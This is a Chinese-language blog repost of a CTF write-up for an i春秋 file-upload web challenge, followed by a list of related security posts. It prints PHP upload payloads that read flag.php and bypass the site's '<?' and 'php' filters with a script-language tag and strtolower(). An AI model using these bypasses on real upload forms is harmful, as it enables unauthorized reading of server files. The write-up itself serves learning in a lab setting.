2. 程式人生 > 實用技巧 >喬悟空-CTF-i春秋-Web-Upload

喬悟空-CTF-i春秋-Web-Upload

阿新 發佈:2020-09-03

2020.09.03

ai 做過的題,兩天不看就忘了……

做題

題目

題目地址

thinking……

  1. 開啟網站

  2. 告訴了檔案在flag.php中,所以寫個php,把flag.php檔案讀取出來就行
    盜來的php

<?php 
    $ctx = stream_context_create(array( 
        'http' => array( 
            'timeout' => 1    //設定超時
            ) 
        ) 
    ); 
    echo file_get_contents("flag.php", 0, $ctx); 
?>

這裡一開始直接在連線後邊訪問上傳的檔案,訪問不到……後來發現是上傳到/u目錄下了……

訪問輸出:

很明顯能看出來這是把php的頭給過濾了,然後找到了以下程式碼來代替

  1. 繞過php<?過濾

程式碼如下:

<script language='PHP'>
    echo file_get_contents("../flag.".strtolower("PHP")); 
</script>

經過測試,有幾點要說:
- 上邊我本來把flag.php改成flag.pHp,但是並不能成功,說明檔案系統對檔案字尾名也是有區分的。
- 檔案被上傳的路徑可以通過表單原始碼進行檢視
- ../

就是上一層目錄下的檔案

  1. 結果

總結

  1. php讀取檔案的幾種方式
    • fread、fgets、fgetss、file、readfile、file_get_contents、fpassthur
    • 詳細連結
  2. <?被過濾,用script標籤來繞過
  3. php被過濾,用大寫來繞過,可以用strtolower()來變成小寫
  4. 伺服器中檔案,字尾名大小寫也會有影響

相關推薦

-CTF-i春秋-Web-Upload

2020.09.03 ai 做過的題,兩天不看就忘了…… 做題 題目 題目地址 thinking…… 開啟網站

-CTF-i春秋-Web-Not Found-🙋🏻‍♂️

2020.09.08 又是匆匆忙忙的一天~ 做題 題目 題目地址 做題 做題??做個屁,啥也不知道,乾瞪眼

CTF-i春秋-Web-Upload-線上選拔賽-SVN 原始碼洩露漏洞

2020.09.21 經驗教訓 python中,post的內容是json格式; SVN 原始碼洩露漏洞,就是有個.svn目錄,.svn/wc.db,大量使用者資料,.svn/entries,能遍歷網站目錄,隱藏檔案.svn/.svn-base原始碼檔案副本

CTF-i春秋-Web-檔案包含漏洞、檔案上傳漏洞-Do you know upload?-第三屆“百越杯”福建省高校網路空間安全大賽

2020.09.21 經驗教訓 檔案包含漏洞,想到php://input和php://filter/read=convert.base64-encode/resource=index.php

CTF-i春秋-Web-Hash

2020.09.17 哈哈,我又來了 i春秋 做題 Hash 開啟連結,出現一個超連結,點進去,原始碼中出現線索you are 123;if you are not 123,you can get the flag<br><!--$hash=md5($sign.$key);the length of

CTF-i春秋-Web-cookie欺騙、陣列繞過正則過濾、rot13-who are you?-2017第二屆廣東省強網杯線上賽

2020.09.21 經驗教訓 rot13,凱撒密碼的一種變形,因為其加密和解密只用一種方法,所以比較流行,實質就是字母表偏移13位

CTF-i春秋-Web-偏移、置換密碼-破譯-2016全國大學生資訊保安競賽

2020.09.21 經驗教訓 破譯 https://www.ichunqiu.com/battalion 什麼玩意這是

面板返場預熱,5.20情侶面板猜想,大可能性最大

3月份所剩時間不多,而大家也都知道下個月就會正式開啟新賽季,那麼在新賽季開啟之前,我們還會不會迎來新一輪的驚喜呢?

vivo 活動中臺 - H5 活動載入優化

本文首發於 vivo網際網路技術 微信公眾號連結: https://mp.weixin.qq.com/s/6gtVR0nVNcZvREjwftZgzA作者:空中臺研發團隊

爬取B站18000條《黑神話:》實機演示彈幕,做成詞雲

前言 從不畏懼死亡,只是不忍世道淪喪。 哪怕前途多屍骨,身後無退路—— 這個世界,總有勇敢的生命,再次踏上取經之途。 由遊戲科學開發的西遊題材單機·動作·角色扮演遊戲《黑神話:悟空

i春秋 Misc)ReCreators - CryMisc

⭐【i春秋 Misc】 【題目連結】 i春秋 Misc ReCreators CryMisc ⭐ReCreators 下載得到一個檔案。老規矩,放入010文字編輯器中檢視:

雲課堂】第三十三期:表示式永假/永真(CWE-570:Expression is Always False)

技術標籤:雲課堂安全漏洞程式碼規範資訊保安 關注公眾號“中科天齊軟體安全中心”(id:woocoom),一起漲知識!

雲課堂】第十二期:LDAP注入漏洞(CWE-90: Improper Neutralization of Special Elements used in an LDAP Query)

技術標籤:雲課堂程式碼規範安全漏洞ldap 關注公眾號“中科天齊軟體安全中心”(id:woocoom),一起漲知識!

雲課堂】第十期:日誌偽造漏洞(CWE-117: Improper Output Neutralization for Logs)

技術標籤:雲課堂安全漏洞程式碼規範 關注公眾號“中科天齊軟體安全中心”(id:woocoom),一起漲知識!

雲課堂】第九期:switch中省略了break語句導致的程式碼缺陷

技術標籤:雲課堂 關注公眾號“中科天齊軟體安全中心”(id:woocoom),一起漲知識!

雲課堂】第七期:不安全的反射漏洞(CWE-470: Use of Externally-Controlled Input to Select Classes or Code)

技術標籤:雲課堂java程式碼規範安全漏洞 關注公眾號“中科天齊軟體安全中心”(id:woocoom),一起漲知識!

雲課堂】第三十一期:使用錯誤的運算子進行字串比較(CWE-597:Use of Wrong Operator in String Comparison)

技術標籤:雲課堂安全漏洞安全程式碼規範資訊保安java 關注公眾號“中科天齊軟體安全中心”(id:woocoom),一起漲知識!

雲課堂】第二十九期:通用異常捕獲宣告(CWE-396: Declaration of Catch for Generic Exception)

技術標籤:雲課堂程式碼規範安全安全漏洞資訊保安java 關注公眾號“中科天齊軟體安全中心”(id:woocoom),一起漲知識!

雲課堂】第二十七期:HTTPS會話裡的敏感Cookie沒有設定‘Secure‘屬性(CWE-614)

技術標籤:雲課堂程式碼規範安全安全漏洞資訊保安https 關注公眾號“中科天齊軟體安全中心”(id:woocoom),一起漲知識!

雲課堂】第二十六期:通過錯誤訊息導致的資訊暴露(CWE-209:Generation of Error Message Containing Sensitive Information)

技術標籤:雲課堂程式碼規範安全漏洞安全資訊保安java 關注公眾號“中科天齊軟體安全中心”(id:woocoom),一起漲知識!